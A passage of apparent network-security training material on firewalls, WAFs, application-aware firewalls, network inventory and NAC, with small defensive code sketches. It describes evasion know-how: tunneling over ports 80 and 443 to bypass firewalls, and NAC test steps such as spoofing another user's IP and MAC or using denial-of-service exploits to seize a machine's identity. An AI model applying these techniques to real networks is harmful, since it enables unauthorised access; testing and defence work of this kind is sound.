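# Process names and verdicts below are hypothetical examples.

RULES = {
    "firefox.exe": "allow",        # known, permitted application
    "unknown_tool.exe": "block",   # explicitly denied application
}

def decide(process: str, default: str = "prompt") -> str:
    """Per-process verdict; processes without a rule fall back to prompting
    the user, mirroring how host-based application firewalls define rules."""
    return RULES.get(process, default)
```

This is exactly why such filters are usually combined with a packet filter: the process-level verdict says nothing about which ports or hosts the connection may use.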
Distributed web application firewalls
Distributed Web Application Firewall (also called a dWAF) is a member of the web application firewall
(WAF) and web application security family of technologies. Purely software-based, the dWAF
architecture is designed as separate components able to physically exist in different areas of the network.
This advance in architecture allows the resource consumption of the dWAF to be spread across a network
rather than depend on one appliance, while allowing complete freedom to scale as needed. In particular, it
allows the addition / subtraction of any number of components independently of each other for better
resource management. This approach is ideal for large and distributed virtualized infrastructures such as
private, public or hybrid cloud models.
Cloud-based web application firewalls
Cloud-based Web Application Firewall is also member of the web application firewall (WAF)
and Web applications security family of technologies. This technology is unique due to the fact
that it is platform agnostic and does not require any hardware or software changes on the host,
just a DNS change. By applying this DNS change, all web traffic is routed through the WAF
where it is inspected and threats are thwarted. Cloud-based WAFs are typically centrally
orchestrated, which means that threat detection information is shared among all the tenants of the
service. This collaboration results in improved detection rates and lower false positives. Like
other cloud-based solutions, this technology is elastic, scalable and typically offered as a pay-as-you-grow
service. This approach is ideal for cloud-based web applications and small or
medium sized websites that require web application security but are not willing or able to make
software or hardware changes to their systems.
 In 2010, Imperva spun out Incapsula to provide a cloud-based WAF for small to medium
sized businesses.
 Since 2011, United Security Providers provides the Secure Entry Server as an Amazon EC2
Cloud-based Web Application Firewall
 Akamai Technologies offers a cloud-based WAF that incorporates advanced features such as
rate control and custom rules enabling it to address both layer 7 and DDoS attacks.
The Common Firewall’s Limits
1. The common firewall works on ACL rules where something is allowed or denied based
on a simple set of parameters such as Source IP, Destination IP, Source Port and
Destination Port.
2. Most firewalls don’t support application level rules that would allow the creation of smart
rules that match today’s more active application-rich technology world.
3. Every hacker knows that 99.9% of the firewalls on the planet are configured to
allow connections to remote machines on TCP port 80, since this is the port of the
“WEB”, used by HTTP.
4. Today’s firewalls will allow any kind of traffic to leave the organization on port 80, which
means that:
 Hackers can use “network tunneling” technology to transfer ANY kind of
information on port 80 and therefore bypass all of the currently deployed firewalls
 In terms of traffic and content going through a port defined to be open, such as port 80,
Firewalls are configured to act as a blacklist, therefore tunneling an ENCRYPTED
connection such as SSL and SSH on port 80, will bypass all of the firewall’s
potential inspection features.
 The problem gets worse when ports that carry encrypted connections are commonly
available, such as port 443, which carries the encrypted HTTPS protocol. Hackers
can tunnel any communication on port 443 and encrypt it with HTTPS to imitate
the behavior of any standard browser.
 Firewalls that do inspect SSL traffic rely on generating and signing a certificate of
their own for the browsed domain; the browser accepts it because the firewall is
defined on the machine as a trusted Certificate Authority. However, as firewalls work
mostly in blacklist mode, they will still forward any traffic that they fail to open and
inspect.
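The simple ACL model described in point 1 can be sketched as a first-match rule table with a default deny. The rule entries are illustrative:

```python
# Sketch of common-firewall ACL matching: each rule matches on source network,
# destination network and destination port; first match wins, default deny.
import ipaddress

RULES = [  # (src_net, dst_net, dst_port, action) - illustrative policy
    ("10.0.0.0/8", "0.0.0.0/0", 80,  "allow"),   # web traffic out
    ("10.0.0.0/8", "0.0.0.0/0", 443, "allow"),   # HTTPS out
]

def check(src: str, dst: str, dst_port: int) -> str:
    """Return the verdict for one connection attempt."""
    for src_net, dst_net, port, action in RULES:
        if (ipaddress.ip_address(src) in ipaddress.ip_network(src_net)
                and ipaddress.ip_address(dst) in ipaddress.ip_network(dst_net)
                and dst_port == port):
            return action
    return "deny"   # nothing matched: default deny
```

The sketch also illustrates the limitation described above: the rule table sees only addresses and ports, so anything tunneled over an allowed port such as 80 passes unchallenged.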
Implementing Application Aware Firewalls
Features
Palo Alto Networks has built a next-generation firewall with several innovative technologies
enabling organizations to fix the firewall. These technologies bring business-relevant elements
(applications, users, and content) under policy control on high performance firewall architecture.
This technology runs on a high-performance, purpose-built platform based on Palo Alto
Networks' Single-Pass Parallel Processing (SP3) Architecture. Unique to the SP3 Architecture,
traffic is only examined once, using hardware with dedicated processing resources for security,
networking, content scanning and management to provide line-rate, low-latency performance
under load.
Application Traffic Classification
Accurate traffic classification is the heart of any firewall, with the result becoming the basis of
the security policy. Traditional firewalls classify traffic by port and protocol, which, at one point,
was a satisfactory mechanism for securing the perimeter.
Today, applications can easily bypass a port-based firewall; hopping ports, using SSL and SSH,
sneaking across port 80, or using non-standard ports. App-ID™, a patent-pending traffic
classification mechanism that is unique to Palo Alto Networks, addresses the traffic classification
limitations that plague traditional firewalls by applying multiple classification mechanisms to the
traffic stream, as soon as the device sees it, to determine the exact identity of applications
traversing the network.
Classify traffic based on applications, not ports.
App-ID uses multiple identification mechanisms to determine the exact identity of applications
traversing the network. The identification mechanisms are applied in the following manner:
 Traffic is first classified based on the IP address and port.
 Signatures are then applied to the allowed traffic to identify the application based on unique
application properties and related transaction characteristics.
 If App-ID determines that encryption (SSL or SSH) is in use and a decryption policy is in
place, the application is decrypted and application signatures are applied again on the
decrypted flow.
 Decoders for known protocols are then used to apply additional context-based signatures to
detect other applications that may be tunneling inside of the protocol (e.g., Yahoo! Instant
Messenger used across HTTP).
 For applications that are particularly evasive and cannot be identified through advanced
signature and protocol analysis, heuristics or behavioral analysis may be used to determine the
identity of the application.
As the applications are identified by the successive mechanisms, the policy check determines how to
treat the applications and associated functions: block them, or allow them and scan for threats, inspect
for unauthorized file transfer and data patterns, or shape using QoS.
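The successive classification mechanisms above can be sketched as a small pipeline. This is a loose illustration, not Palo Alto Networks' implementation: the port table, TLS check and the "YMSG" decoder marker are stand-ins for real signatures and decoders:

```python
# Sketch of successive traffic classification: port-based first, then
# decryption (if policy allows), then decoders/signatures on the payload.
# All signatures and markers below are simplified stand-ins.

def classify(port: int, payload: bytes, decrypt=None) -> str:
    # Step 1: initial classification by port
    app = {80: "web-browsing", 443: "ssl"}.get(port, "unknown")
    # Step 3: if traffic looks like TLS and a decryption policy is in place,
    # decrypt so signatures can run on the cleartext flow
    if payload.startswith(b"\x16\x03") and decrypt is not None:
        payload = decrypt(payload)
    # Step 4: a protocol decoder spots an application tunneled inside HTTP
    if b"YMSG" in payload:
        return "yahoo-im"
    # Step 2: application signature on the (possibly decrypted) payload
    if payload.startswith((b"GET ", b"POST ")):
        return "web-browsing"
    return app
```

Once the application identity is known, the policy check, not the classifier, decides whether to block, allow and scan, or shape the flow.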
Always on, always the first action taken across all ports.
Classifying traffic with App-ID is always the first action taken when traffic hits the firewall, which
means that all App-IDs are always enabled, by default. There is no need to enable a series of
signatures to look for an application that is thought to be on the network; App-ID is always classifying
all of the traffic, across all ports - not just a subset of the traffic (e.g., HTTP). All App-IDs are looking
at all of the traffic passing through the device; business applications, consumer applications, network
protocols, and everything in between.
App-ID continually monitors the state of the application to determine whether the application changes
midstream, provides the updated information to the administrator in ACC, applies the appropriate
policy and logs the information accordingly. Like all firewalls, Palo Alto Networks next-generation
firewalls use positive control: all traffic is denied by default, then only those applications that are
within the policy are allowed. All else is blocked.
All classification mechanisms, all application versions, all OSes.
App-ID operates at the services layer, monitoring how the application interacts between the client and
the server. This means that App-ID is indifferent to new features, and it is client or server operating
system agnostic. The result is that a single App-ID for BitTorrent is roughly equivalent to the
many BitTorrent OS and client signatures that need to be enabled to try to control this application in
other offerings.
Full visibility and control of custom and internal applications.
Internally developed or custom applications can be managed using either an application override or
custom App-IDs. An application override effectively renames the traffic stream to that of the internal
application. The other mechanism is to use customizable App-IDs based on context-based
signatures for HTTP, HTTPS, FTP, IMAP, SMTP, RTSP, Telnet, and unknown TCP/UDP traffic.
Organizations can use either of these mechanisms to exert the same level of control over their internal
or custom applications that may be applied to SharePoint, Salesforce.com, or Facebook.
Securely Enabling Applications Based on Users & Groups
Traditionally, security policies were applied based on IP addresses, but the increasingly dynamic
nature of users and applications means that IP addresses alone have become ineffective as a
mechanism for monitoring and controlling user activity. Palo Alto Networks next-generation firewalls
integrate with a wide range of user repositories and terminal service offerings, enabling organizations
to incorporate user and group information into their security policies. Through User-ID, organizations
also get full visibility into user activity on the network as well as user-based policy-control, log
viewing and reporting.
Transparent use of users and groups for secure application enablement.
User-ID seamlessly integrates Palo Alto Networks next-generation firewalls with the widest range of
enterprise directories on the market: Active Directory, eDirectory, OpenLDAP and most other LDAP-
based directory servers. The User-ID agent communicates with the domain controllers, forwarding the
relevant user information to the firewall, making the policy tie-in completely transparent to the end-
user.
Identifying users via a browser challenge.
In cases where a user cannot be automatically identified through a user repository, a captive portal can
be used to identify users and enforce user-based security policy. To make the authentication
process completely transparent to the user, Captive Portal can be configured to send an NTLM
authentication request to the web browser instead of an explicit username and password prompt.
Integrate user information from other user repositories.
In cases where organizations have a user repository or application that already has knowledge of users
and their current IP addresses, an XML-based REST API can be used to tie the repository to the Palo
Alto Networks next-generation firewall.
Transparently extend user-based policies to non-Windows devices.
User-ID can be configured to constantly monitor for logon events produced by Mac OS X, Apple iOS,
Linux/UNIX clients accessing their Microsoft Exchange email. By expanding the User-ID support to
non-Windows platforms, organizations can deploy consistent application enablement policies.
Visibility and control over terminal services users.
In addition to support for a wide range of directory services, User-ID provides visibility and policy
control over users whose identity is obfuscated by a Terminal Services deployment (Citrix or
Microsoft). Completely transparent to the user, every session is correlated to the appropriate user,
which allows the firewall to associate network connections with users and groups sharing one host on
the network. Once the applications and users are identified, full visibility and control within ACC,
policy editing, logging and reporting is available.
High Performance Threat Prevention
Content-ID combines a real-time threat prevention engine with a comprehensive URL database and
elements of application identification to limit unauthorized data and file transfers, detect and block a
wide range of threats and control non-work related web surfing. The application visibility and control
delivered by App-ID, combined with the content inspection enabled by Content-ID means that IT
departments can regain control over application traffic and the related content.
NSS-rated IPS.
The NSS-rated IPS blocks known and unknown vulnerability exploits, buffer overflows, DoS attacks
and port scans from compromising and damaging enterprise information resources. IPS mechanisms
include:
 Protocol decoder-based analysis statefully decodes the protocol and then intelligently applies
signatures to detect vulnerability exploits.
 Protocol anomaly-based protection detects non-RFC compliant protocol usage such as the use
of overlong URI or overlong FTP login.
 Stateful pattern matching detects attacks across more than one packet, taking into account
elements such as the arrival order and sequence.
 Statistical anomaly detection prevents rate-based DoS flooding attacks.
 Heuristic-based analysis detects anomalous packet and traffic patterns such as port scans and
host sweeps.
 Custom vulnerability or spyware phone-home signatures that can be used in either the anti-
spyware or vulnerability protection profiles.
 Other attack protection capabilities such as blocking invalid or malformed packets, IP
defragmentation and TCP reassembly are utilized for protection against evasion and
obfuscation methods employed by attackers.
Traffic is normalized to eliminate invalid and malformed packets, while TCP reassembly and IP
defragmentation are performed to ensure the utmost accuracy and protection despite any attack evasion
techniques.
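Stateful pattern matching and TCP reassembly go together: a signature split across two segments is only visible once the stream is rebuilt in sequence order. A minimal sketch, with a toy signature:

```python
# Sketch of stateful pattern matching: reassemble TCP segments by sequence
# number, then search the rebuilt stream for a signature that no single
# segment contains on its own.

def reassemble(segments):
    """segments: iterable of (seq_number, bytes); returns the ordered stream."""
    return b"".join(data for _, data in sorted(segments))

def match(segments, signature: bytes) -> bool:
    """True if the signature appears in the reassembled stream."""
    return signature in reassemble(segments)
```

An attacker who fragments or reorders packets to hide a pattern is defeated by the reassembly step, which is why normalization is performed before signature matching.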
URL Filtering
Complementing the threat prevention and application control capabilities is a fully integrated URL
filtering database of 20 million URLs across 76 categories that enables IT departments to
monitor and control employee web surfing activities. The on-box URL database can be augmented to
suit the traffic patterns of the local user community with a custom, 1 million URL database. URLs that
are not categorized by the local URL database can be pulled into cache from a hosted, 180 million
URL database.
In addition to database customization, administrators can create custom URL categories to further
tailor the URL controls to suit their specific needs. URL filtering visibility and policy controls can be
tied to specific users through the transparent integration with enterprise directory services (Active
Directory, LDAP, eDirectory) with additional insight provided through customizable reporting and
logging.
File and Data Filtering
Data filtering features enable administrators to implement policies that will reduce the risks associated
with the transfer of unauthorized files and data.
 File blocking by type: Control the flow of a wide range of file types by looking deep within the
payload to identify the file type (as opposed to looking only at the file extension).
 Data filtering: Control the transfer of sensitive data patterns such as credit card and social
security numbers in application content or attachments.
 File transfer function control: Control the file transfer functionality within an individual
application, allowing application use yet preventing undesired inbound or outbound file
transfer.
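The data-filtering idea of catching sensitive patterns such as credit card numbers can be sketched with a regex plus the standard Luhn checksum to cut false positives. The pattern and length bounds are illustrative policy choices:

```python
# Sketch of data filtering: flag credit-card-like numbers in outbound content.
# The regex and length bounds are illustrative; the Luhn checksum is standard.
import re

def luhn_ok(digits: str) -> bool:
    """Standard Luhn checksum used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def contains_card_number(text: str) -> bool:
    """True if the text contains a 13-16 digit run that passes Luhn."""
    for m in re.finditer(r"\b(?:\d[ -]?){13,16}\b", text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 16 and luhn_ok(digits):
            return True
    return False
```

A firewall policy would block or log the transfer when this check fires on application content or attachments.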
Checkpoint R75 – Application Control Blade
Granular application control
 Identify, allow, block or limit usage of thousands of applications by user or group
 UserCheck technology alerts users about controls, educates on Web 2.0 risks, policies
 Embrace the power of Web 2.0 Social Technologies and applications while protecting
against threats and malware
Largest application library with AppWiki
 Leverages the world's largest application library with over 240,000 Web 2.0 applications
and social network widgets
 Identifies, detects, classifies and controls applications for safe use of Web 2.0 social
technologies and communications
 Intuitively grouped in over 80 categories—including Web 2.0, IM, P2P, Voice & Video
and File Share
Integrated into Check Point Software Blade Architecture
 Centralized management of security policy via a single console
 Activate application control on any Check Point security gateway
 Supported gateways include: UTM-1, Power-1, IP Appliances and IAS Appliances
Main Functionalities
 Application detection and usage control
 Enables application security policies to identify, allow, block or limit usage of thousands
of applications, including Web 2.0 and social networking, regardless of port, protocol or
evasive technique used to traverse the network.
 AppWiki application classification library
 AppWiki enables application scanning and detection of more than 4,500 distinct
applications and over 240,000 Web 2.0 widgets including instant messaging, social
networking, video streaming, VoIP, games and more.
 Inspect SSL Encrypted Traffic
 Scan and secure SSL encrypted traffic passing through the gateway, such as HTTPS.
 UserCheck
 UserCheck technology alerts employees in real-time about their application access
limitations, while educating them on Internet risk and corporate usage policies.
 User and machine awareness
 Integration with the Identity Awareness Software Blade enables users of the Application
Control Software Blade to define granular policies to control applications usage.
 Central policy management
 Centralized management offers unmatched leverage and control of application security
policies and enables organizations to use a single repository for user and group
definitions, network objects, access rights and security policies.
 Unified event management
 Using SmartEvent to view user’s online behavior and application usage provides
organizations with the most granular level of visibility.
Utilizing Firewalls for Maximum Security
1. Don’t use an old, non-application-aware firewall.
2. The first firewall rule must be: deny all protocols on all ports, from all IPs to all IPs.
3. Only rules for required systems must be allowed. For example:
a. HTTP, HTTPS – to all
b. IMAPS – to the internal mail server
c. NetBIOS – to the internal file server, etc.
4. Activate application inspection on all traffic on all ports.
5. Enforce that only the defined traffic type is allowed on each port. For example, on
port 80 only identified HTTP traffic would be allowed.
6. Don’t allow forwarding of any traffic that failed to be inspected.
7. Define the DNS server as the Domain Controller, do not allow recursive/authoritative
DNS requests from other hosts, and make sure the firewall inspects the Domain
Controller’s outgoing DNS requests in STRICT mode.
8. Activate egress filtering to avoid sending spoofed packets and unknowingly or
unwillingly participating in DDoS attacks.
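Rules 5 and 6 above, forwarding only identified HTTP on port 80 and dropping whatever fails inspection, can be sketched as a check on the first bytes of a flow. The method list is a simplified stand-in for real protocol identification:

```python
# Sketch of rules 5-6: on port 80, forward only traffic that is identifiable
# HTTP; anything else (a tunneled SSH or TLS stream, for example) is dropped.
# Matching on request-method prefixes is a simplified stand-in for full
# protocol identification.

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ")

def port80_verdict(first_bytes: bytes) -> str:
    """Verdict for the opening bytes of a client flow on port 80."""
    if first_bytes.startswith(HTTP_METHODS):
        return "forward"
    return "drop"   # rule 6: never forward what failed inspection
```

Under this whitelist-style enforcement, the tunneling tricks described earlier (SSH or TLS smuggled over port 80) fail at the first packet.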
Implementing a Back-Bone Application-Aware Firewall
Implementing a Back-Bone Application-Aware Firewall is the perfect security solution for
absolute network management.
The best configuration is:
1. Combining full Layer 2 security in switch and router equipment
2. Dividing all of the organization’s devices into VLANs that represent the organization’s
logical groups
3. Configuring each port in each one of the VLANs as PVLAN Edge, so that no endpoint
can talk with any other endpoint via Layer 2
4. Defining all routers to forward all traffic to the firewall (their next hop)
5. Placing an application aware firewall as the backbone before the backbone router
Network Inventory & Monitoring
How to map your network connections?
1. Since everyday IT management involves many tasks, no one really inspects the
currently open connections.
2. It is possible to configure the firewall to log every established TCP connection and every
host which sent any packet (ICMP, UDP) to any non-TCP port.
3. The result of such a configuration would be a list of unknown IPs. It is possible to write an
automatic script to execute a reverse-DNS lookup and an IP WHOIS search on each IP
and create a “resolved list” which has some meaning to it.
4. Any unknown or unfamiliar IP accessed from within the network requires matching the
number of stations which accessed it and making a basic forensic investigation on them
in order to discover the software which made the connection.
5. This process is very technical and time consuming, requires especially skilled security
professionals, and therefore is not executed unless a security incident was reported.
6. The only solution that turns this process from impossible into very reasonable and
simple is IP/domain/URL whitelisting, which denies everything except a database of
known, well-reputed and malware-clean approved IPs/websites.
7. IP/domain/URL whitelisting is very hard to implement and requires a high amount of
maintenance; it is up to you to make your choice.
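The automatic script mentioned in step 3 can be sketched with the standard library's reverse-DNS lookup; the WHOIS step is omitted here since it would need an external client or library:

```python
# Sketch of the "resolved list" script from step 3: reverse-DNS each IP
# logged by the firewall. (A real version would also run an IP WHOIS query
# on each address; that step is omitted here.)
import socket

def resolve_ips(ips):
    """Map each logged IP to its PTR hostname, or mark it for investigation."""
    resolved = {}
    for ip in ips:
        try:
            resolved[ip] = socket.gethostbyaddr(ip)[0]   # reverse-DNS (PTR) lookup
        except OSError:
            resolved[ip] = "unresolved"                  # candidate for forensic review
    return resolved
```

IPs that stay "unresolved" or resolve to unfamiliar domains are exactly the ones step 4 says to investigate.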
How to discover all network devices?
1. Mapping of the network is provided by Firewalls, Anti-Viruses, NACs, SIEM and
Configuration Management products.
2. Some products include an agent that runs on the endpoint, acts as a network sensor and
reports all the machines that passively or actively communicated on its subnet.
3. It is possible to purchase a “Network Inventory Management” solution.
The most reliable way to detect all machines on the network is to combine:
1. Switches know all the ports that have an electrical link signal, and know the MAC of
every device that ever sent a non-spoofed Layer 2 frame on that port.
2. Connect via SNMP to the switches and extract all MACs and IPs on all ports.
3. Run a full TCP and UDP scan of ports 1 to 65535 across the entire network (without any
ping or is-alive scans). If there is a hidden machine listening on a self-defined IP
on a specific TCP/UDP port, it will answer at least one packet and will be detected by the
scan.
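The probe behind step 3 can be sketched as a plain TCP connect() check with no prior ping, so a host that ignores ICMP is still detected the moment it answers a handshake on any port:

```python
# Sketch of step 3: a TCP connect() probe with no ping/is-alive stage.
# A hidden host listening on any port completes the handshake and is detected.
import socket

def tcp_port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

A full sweep would call this (or an asynchronous equivalent) for ports 1-65535 across every address in the subnet; UDP detection needs a separate probe since UDP has no handshake.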
Detecting “Hidden” Machines – Machines behind a NAT INSIDE Your Network
1. Looking for timing anomalies in ICMP and TCP
2. Looking for IP ID strangeness
a. A NAT with Windows machines behind a Linux host might produce non-incremental
IPID packets interspersed with incremental IPID packets
3. Looking for unusual headers in packets
a. Timestamps and other optional parameters may have inherent patterns
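The IP ID heuristic in point 2 can be sketched as a check on the observed IPID sequence: a single host with a global incremental counter produces small positive deltas, while interleaved streams from several hosts behind a NAT do not. The step threshold is an illustrative tuning choice:

```python
# Sketch of the IP ID anomaly heuristic: test whether a sequence of observed
# IPID values looks like one global incremental counter (a single host) or
# like interleaved counters (multiple hosts behind a NAT). The max_step
# threshold is an illustrative tuning parameter.

def looks_like_single_counter(ipids, max_step=16):
    """True if consecutive IPIDs show small positive wrap-aware deltas."""
    deltas = [(b - a) % 65536 for a, b in zip(ipids, ipids[1:])]
    return all(0 < d <= max_step for d in deltas)
```

Real tools combine this with the timing and header checks above, since some stacks randomize IPID and would defeat the counter test on its own.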
How to discover all cross-network installed software?
There are two common ways to discover the software installed on the network’s machines:
1. Agent-Less – discovery is done by connecting to the machine remotely through:
a. RPC/WMI
b. SNMP
On Windows systems, WMI provides most of the classical functionality, though it only
detects software installed by “Windows Installer” and software registered in the
“Uninstall” registry key.
Some machines can’t be “managed”/connected to remotely over the network since:
1. They have a firewall installed or configured to block WMI/RPC access
2. They have a permission error – “Domain Administrator” removed from the “Local
Administrators” group
3. They are not part of the domain – they were never reported and registered
2. Agent-Based – provides the maximum level of discovery, can scan the memory, raw disk,
files, folders locally and report back all of the detected software.
Once the agent is installed, most of the common permission, firewall, connectivity
and latency problems are solved.
The main problems are machines the agent was removed from and unknown machines
which never had the agent installed.
3. The Ultimate Solution – Combining agent-based with agent-less technology, this way all
devices get detected and most of the possible information is extracted from them.
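The combined approach in point 3 amounts to merging the two inventories so that every device appears, preferring the richer agent-based record where one exists. A minimal sketch, with illustrative record fields:

```python
# Sketch of the combined approach: merge agent-less discovery (SNMP/WMI) with
# agent-based reports, preferring the deeper agent-based record when a host
# appears in both. Record fields below are illustrative.

def merge_inventories(agentless: dict, agent_based: dict) -> dict:
    """Union of both inventories, keyed by hostname; agent data wins."""
    merged = dict(agentless)        # start with everything agent-less discovery saw
    merged.update(agent_based)      # overwrite with richer agent-based records
    return merged
```

Devices that can never run an agent (printers, cameras) survive via the agent-less half, while managed endpoints get the full agent-level detail.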
NAC
The Problem: Ethernet Network
 Authenticate (Who):
o distinguish between a valid and a rogue member
 Control (Where to and How?):
o all network members at the network level
 Authorize (Application Layer Conditions):
o check device compliance according to company policy
What is a NAC originally?
 The concept was invented in 2003 originally called “Network Admission Control”
 The idea: checking the software version on machines connecting to the network
 The Action: denying connection for those below the standard
Today’s NAC?
 Re-Invented as: Network Access Control
 Adding to the old idea: preventing ANY foreign machine from connecting to the
computer network
 The Actions:
o Shut down the power on that port of the switch
o Move the foreign machine to a Guest VLAN
Why Invent Today’s NAC?
Dynamic Solution for a Dynamic Environment
Did We EVER Manage Who Gets IP Access?
What is a NAC?
Network Access Control (NAC) is a computer networking solution that uses a set of protocols to
define and implement a policy that describes how to secure access to network nodes by devices
when they initially attempt to access the network. NAC might integrate the automatic remediation
process (fixing non-compliant nodes before allowing access) into the network systems, allowing
the network infrastructure such as routers, switches and firewalls to work together with back
office servers and end user computing equipment to ensure the information system is operating
securely before interoperability is allowed.
Network Access Control aims to do exactly what the name implies—control access to
a network with policies, including pre-admission endpoint security policy checks and post-
admission controls over where users and devices can go on a network and what they can do.
Initially 802.1X was also thought of as NAC. Some still consider 802.1X as the simplest form of
NAC, but most people think of NAC as something more.
Simple Explanation
When a computer connects to a computer network, it is not permitted to access anything unless it
complies with a business defined policy, including anti-virus protection level, system update level
and configuration.
While the computer is being checked by a pre-installed software agent, it can only access
resources that can remediate (resolve or update) any issues. Once the policy is met, the computer
is able to access network resources and the Internet, within the policies defined within the NAC
system.
NAC is mainly used for endpoint health checks, but it is often tied to role-based access. Access
to the network will be given according to the profile of the person and the results of a posture/health
check. For example, in an enterprise, the HR department could access HR department files only if
both the role and the endpoint meet anti-virus minimums.
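The pre-admission posture check described above can be sketched as comparing an endpoint's self-report against a business-defined policy, with non-compliant machines sent to a remediation network. Field names and minimum values are illustrative:

```python
# Sketch of a NAC pre-admission posture check: compare an endpoint report
# against a business-defined policy and grant access or quarantine for
# remediation. Field names and minimums below are hypothetical.

POLICY = {
    "av_signatures_min": 20240101,   # minimum antivirus signature date
    "os_patch_level_min": 10,        # minimum system update level
}

def admit(endpoint: dict) -> str:
    """Verdict for a connecting endpoint: full access or remediation VLAN."""
    if (endpoint.get("av_signatures", 0) >= POLICY["av_signatures_min"]
            and endpoint.get("os_patch_level", 0) >= POLICY["os_patch_level_min"]):
        return "access"
    return "remediation-vlan"   # may only reach update/remediation servers
```

A role-based extension would additionally key the final network segment on the authenticated user's group, per the HR example above.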
Goals of NAC
Because NAC represents an emerging category of security products, its definition is both
evolving and controversial.
The overarching goals of the concept can be distilled to:
1. Mitigation of zero-day attacks
The key value proposition of NAC solutions is the ability to prevent end-stations that lack
antivirus, patches, or host intrusion prevention software from accessing the network and
placing other computers at risk of cross-contamination of computer worms.
2. Policy enforcement
NAC solutions allow network operators to define policies, such as the types of computers
or roles of users allowed to access areas of the network, and enforce them in switches,
routers, and network middle boxes.
3. Identity and access management
Where conventional IP networks enforce access policies in terms of IP addresses, NAC
environments attempt to do so based on authenticated user identities, at least for user end-
stations such as laptops and desktop computers.
NAC Approaches
 Agent-Full
o Smarter, Unlimited Features
o Faster
o Works Offline (Settings Cache Mode)
o Endpoint Management Itself is more secure
 Agent-Less
o Modular
o Easy to integrate
o Credentials constantly travel the network
o SNMP Traps and DHCP Requests
NAC – Behavior Lifecycle
NAC = LAN Mini IPS?
 NAC is one of the functions that a full end to end IPS product should provide
 Some vendors don’t sell NAC as a proprietary module, for example:
o ForeScout CounterAct
 NAC only Solutions by
o Trustwave
o McAfee
NAC as Part of Endpoint Security Solutions
 Antivirus Vendors provide NAC (Network Admission Control) on managed endpoints
 Vendors like Symantec, McAfee and Sophos
 A great solution IF:
o The AV Management server controls the switches and disconnects all non-
managed hosts
o Except for defined exclusions (printers, cameras, physical access devices)
Talking Endpoints: What’s a NAP?
 NAP is Microsoft’s built-in support client for NAC
 NAP interoperates with every switch and access point
 Controlled by Group Policy
General Basic NAC Deployment
NAC Deployment Types:
1. Pre-admission and post-admission
There are two prevailing design philosophies in NAC, based on whether policies are
enforced before or after end-stations gain access to the network. In the former case,
called pre-admission NAC, end-stations are inspected prior to being allowed on the
network. A typical use case of pre-admission NAC would be to prevent clients with out-
of-date antivirus signatures from talking to sensitive servers. Alternatively, post-
admission NAC makes enforcement decisions based on user actions, after those users
have been provided with access to the network.
2. Agent versus agentless
The fundamental idea behind NAC is to allow the network to make access control
decisions based on intelligence about end-systems, so the manner in which the network is
informed about end-systems is a key design decision. A key difference among NAC
systems is whether they require agent software to report end-system characteristics, or
whether they use scanning and network inventory techniques to discern those
characteristics remotely.
As NAC has matured, Microsoft now provides their network access protection
(NAP) agent as part of their Windows 7, Vista and XP releases. There are NAP
compatible agents for Linux and Mac OS X that provide near equal intelligence for these
operating systems.
3. Out-of-band versus inline
In some out-of-band systems, agents are distributed on end-stations and report
information to a central console, which in turn can control switches to enforce policy. In
contrast the inline solutions can be single-box solutions which act as internal firewalls
for access-layer networks and enforce the policy. Out-of-band solutions have the
advantage of reusing existing infrastructure; inline products can be easier to deploy on
new networks, and may provide more advanced network enforcement capabilities,
because they are directly in control of individual packets on the wire. However, there are
products that are agentless, and have both the inherent advantages of easier, less risky
out-of-band deployment, but use techniques to provide inline effectiveness for non-
compliant devices, where enforcement is required.
NAC Acceptance Tests
1. Attempting to get an IP using DHCP on a regular Windows machine.
2. Attempting to get an IP using DHCP on a regular Linux machine.
3. Multiple attempts to get an IP using DHCP with a private DHCP client, using different values
than the operating system’s in the DHCP packet fields
4. Manually configuring a local IP of type “Link-Local”
5. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” on
6. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” off
7. Inspecting the NAC’s response to DHCP attacks and network attacks in the “1-2 minutes of
grace”
8. Restricting the WMI (RPC) support on the local machine (even using a firewall to block RPC
on TCP port 135)
9. Copy-Catting/Stealing the identity (IP or IP+MAC) of an existing user (received via passive
network sniffing of broadcasts)
10. Using private Denial of Service 0-day exploits in a loop on a specific machine to obtain its
identity on the network
11. Posing as a printer or other non-smart device (printers, biometric devices, turnstile
controllers, door devices, etc.)
12. Testing the proper enforcement of common NAC protection features, such as:
 Duplicate MAC
 Duplicate IP
 Foreign MAC
 Foreign IP
 Wake-on-LAN
 Domain Membership
 Anti-Virus + Definitions
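Several of the checks above (duplicate MAC, duplicate IP, identity copy-catting) come down to tracking which IP/MAC pairings have been observed on the network. The following is a minimal, hypothetical sketch of such a tracker in Python; the event format and function names are illustrative assumptions, not any specific NAC product's API:

```python
# Minimal sketch of a duplicate-IP / duplicate-MAC detector, as a NAC
# might run it over observed (ip, mac) pairings. The event format here
# is an assumption made for illustration.

def detect_conflicts(events):
    """Return alerts for IPs claimed by multiple MACs and vice versa."""
    ip_to_macs = {}
    mac_to_ips = {}
    alerts = []
    for ip, mac in events:
        # an IP previously seen with a different MAC: spoofing suspect
        if ip_to_macs.setdefault(ip, set()) and mac not in ip_to_macs[ip]:
            alerts.append(("duplicate-ip", ip, mac))
        ip_to_macs[ip].add(mac)
        # a MAC previously seen with a different IP
        if mac_to_ips.setdefault(mac, set()) and ip not in mac_to_ips[mac]:
            alerts.append(("duplicate-mac", mac, ip))
        mac_to_ips[mac].add(ip)
    return alerts

events = [
    ("10.0.0.5", "aa:bb:cc:00:00:01"),
    ("10.0.0.5", "aa:bb:cc:00:00:01"),  # same pairing again: fine
    ("10.0.0.5", "de:ad:be:ef:00:99"),  # same IP, new MAC: alert
]
print(detect_conflicts(events))
```

A real NAC would feed this from switch CAM tables, DHCP snooping or ARP monitoring rather than a static list.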
NAC Vulnerabilities
Attacking a NAC is mostly based on network attacks and focuses on several aspects:
 Vulnerabilities in the integration process – wrong product positioning in the network
architecture or wrong design of the data flow, which results in inconsistent levels of security.
These mistakes are mostly caused by the following:
o Integrator’s lack of understanding of the organization’s requirements, systems
and network architecture
o Integrator’s lack of understanding of the organization’s security policies and its
expectations from the product
